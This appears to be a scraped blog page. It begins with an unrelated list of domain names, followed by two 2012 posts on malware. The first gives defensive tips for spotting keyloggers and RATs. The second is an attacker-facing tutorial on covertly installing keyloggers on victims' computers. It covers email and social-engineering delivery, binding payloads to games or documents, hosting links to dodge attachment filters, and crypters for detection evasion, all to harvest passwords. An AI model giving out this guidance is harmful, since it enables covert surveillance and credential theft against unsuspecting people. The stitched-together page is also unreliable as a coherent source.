savichomes.ca
savichomes.com
sawilson.com
sawilsons.com
serenitymassage.ca
shangrilahills.com
sidewalkfish.com
simalconsulting.ca
simalconsulting.com
soma.easy-web.ca
somasite.biz
somasite.com
somasite.info
somasite.net
somasite.org
stephsco.com
stjohns.opid.ca
stmichaelsinsight.com
sundancekw.com
sunlighthomes.ca
sunnyhospitality.ca
sunnyhospitality.org
sunsetcaptivahomeowners.com
switch.nettrac.net
tan-i-can.com
taneja.ca
thecongregationoftheresurrection.org
thesleeve.com
timberland-group.com
timberland.on.ca
timmer.ca
tonysantoro.com
tradelinkinternational.ca
tradelinkinternational.co.uk
tradelinkintl.ca
trigontoronto.com
tse-international.com
twpatience.com
unitedwayoxford.ca
universalsteelbuildings.com
uvalux.com
uvalux.easy-web.ca
uvdevelopments.com
vanceconstruction.ca
vanhaeren.com
virtualgolfacademy.ca
visramfoundation.com
vistahospitality.ca
vistahospitality.com
vistahotels.com
vistaleasing.ca
vistaleasing.com
wc2.ca
wcri.org
weddings.worldwide.on.ca
wghfoundation.ca
wildandexotic.co.uk
windrider.ca
windycreekkennels.com
wisecopiston.ca
wlac.ca
woodstockcc.on.ca
woodstockchamber.on.ca
woodstockmeadows.com
woodstockminorhockey.com
woodstocknow.biz
woodstocknow.com
workinwoodstock.ca
worldwide.on.ca
wosba.ca
www3.nettrac.net
yourdharmaandgreg.com
zarkys.ca
zarkys.com
zarkyscatering.com
zehrgroup.ca
zehrgroup.com
zmg.on.ca
zorra.easy-web.ca
Read More...

Tuesday, March 27, 2012

Detecting keyloggers and All malicious softwares



This tutorial mainly Focusing on how to detect if your Operating System is infected with any Virus, keylogger or RAT.

For this we should First understand the Functionality and meaning of all of them.

Virus : A malicious Software which Replicates itself and takes over the system and do anything for which it is programmed without user permission or will. These kind of programs are usually programmed by programmers/coders to infect a system.


Keylogger: This is a program which save all the keys pressed from the keyboard and send them to the attacker/programmer/coder/owner whom se ever it is built by. These programs focus on getting the users keylogs and to survive in the system they also includes some capablities like Virus so that they can also stealth and replicate themselve to get some more targets. A keylogger may have many capablities like a Virus. They can be of many type which includes FTP Keyloggers, Email Keyloggers, PHP keyloggers etc


RAT (Remote Admin Tool): This one is the most Advanced program in these malicious softwares because once it enters the system it will give complete control of that system to the attacker/programmer/coder/owner whom se ever it is built by. This kind of program mainly focus on waiting for the Masters Order and when ever he do any order they just have to do the same. But again in order to do such things it need to survive into the system without getting detected by the user or the admin. Such Programs include different capabilities like keylogging, Backdooring, Getting Remote Access, Web Cam Hack, Files Theft etc.

As by now we know the functionalities of all these we can move on how to detect them running in your system.

Following are some of the common symptoms if having your computer Infected:

1. Usually pc gets Slow/Hang while working.
2. Hang Up event takes place again and again after particular time gaps.
3. Getting Error message when running TaskManger/Registry/CMD/Msconfig.
4. TaskManger/Registry/CMD/Msconfig gets killed as they run.
5. List Processes in running under Current user using cmd - tasklist /fi "username eq %username%".
6. Use HTTP debugger and check your traffic to trace out its activity.
7. Use cport to track the applications that are connecting to a port and remote computer.
8. Use "Process Explorer" to track hidden processes.
9. Use "Reg From App" & "Process Activity View" to track Registry and files changes bieng made by any program.
10.Detecting By the Process name is also a easy task but it needs some experience to identify the malicious process from the taskmanager processes tab.

Source:- Bluff Master Hacker
Read More...

What are Keyloggers??



Hey This is a very basic tutorial on Keyloggers.

After Reading this tutorial you will be enough clear on what are keyloggers,

how they work, how to use them, different types of keyloggers, what is the

keyword FUD, How to detect them, how to infect your victim with any of the

Key logger server.


So lets start with the very basic about the Key loggers. Yeah its quite

clear by its name that its a device or a Software that is used to Log the

keys. So lets see what are they Types of Key loggers available.

1. Offline keylogger.
2. Email Keylogger.
3. FTP keyloggers.
4. PHP keyloggers.
5. Hardware keyloggers.

So a offline keylogger is basically a Keylogger that Keylogs the victim and

save those logs in the same Machine so it dont need any internet connection

to work. But these kind of keyloggers need physical access to the Machine to

get it installed and get the Keylogs file. I guess you are not much

interested in such keyloggers..

Now lets give a look to Email loggers....yeah these keylogers are

configured to send the keylogs on email so yeahhhh...you would love them to

get your victims all the passwords and email accounts and all the details

sent to you on your mail account.....damn these days kids are really

criminal.

okey!! well Email Keyloggers makes the logs data quite messy but yeah here

comes the FTP keyloggers which are configured to send the keylogs on FTP and

yeah these keylogs are really easy to read and fun to use.

PHP keyloggers...hmmm these kinda keyloggers are new...ahmm not actually new

but yeahh newer than the others. So these are the keyloggers that send the

data to a php file and that php file save that data in the hosting. so Such

keylogger bieng new are not usually easily detected by the Keyloggers.

hmmmm Hardware keyloggers..such keyloggers are just for professional

use...coxz i dont think that you will love to spend your money in getting

that device which need physical access to the machine as well.

so using them is not at all a big deal...it just you need to buy them so

leave it i dont wanna waste our time talking much about them.

======HOW TO INSTALL A KEYLOGGER======
i dont thing you are that n00b that you cant install a offline keylogger in

victim pc. Coz a Offline keyloggers needs simple installation. Lets talk

about how to install a remotely installable keylogger in victims pc.

there are many ways you can install a Keylogger in victim pc remotely some

of them are:

sending the Server using email.
sending the server using Social engineering on SOcial Networking Sites.
Sending the server using Pendrive
Hide them under games or any software which your frends need.
Hide them Under WOrd or PDF Files
etc...

Okey i dont need to tell you much about the above ways of sending the

keylogger in victim pc.....hmm lemme tell you that server is the executable

file that is specially configured to get installed in a hidden mode on a one

time execution.

Many times people have problem sending keylogger in a mail. yeah right most

of the email providers block exe files as attachment. yup so here is an easy

way just upload yours server on any webhosting and send its link when the

user will click it will automatically downloaded.

Hiding your server in other application needs a special software called

Binders. These are used to Bind two exe files or JPG or any pdf or DOC files

with a exe.

Okey but if you want to hide them under a Word or PDF file then you need to

do this with metasploit. HOw to do this???!! ahmm its out of reach of this

Tutorial [:D]

what is FUD...if you dont know it then its FUlly UnDetectable. YOu can also

make your keylogger server undetectable using Crypters. and some other ways

which will be discussed later in my Next tutorail.

Happy hacking have fun.

Soure:-Bluff Master Hacker
Read More...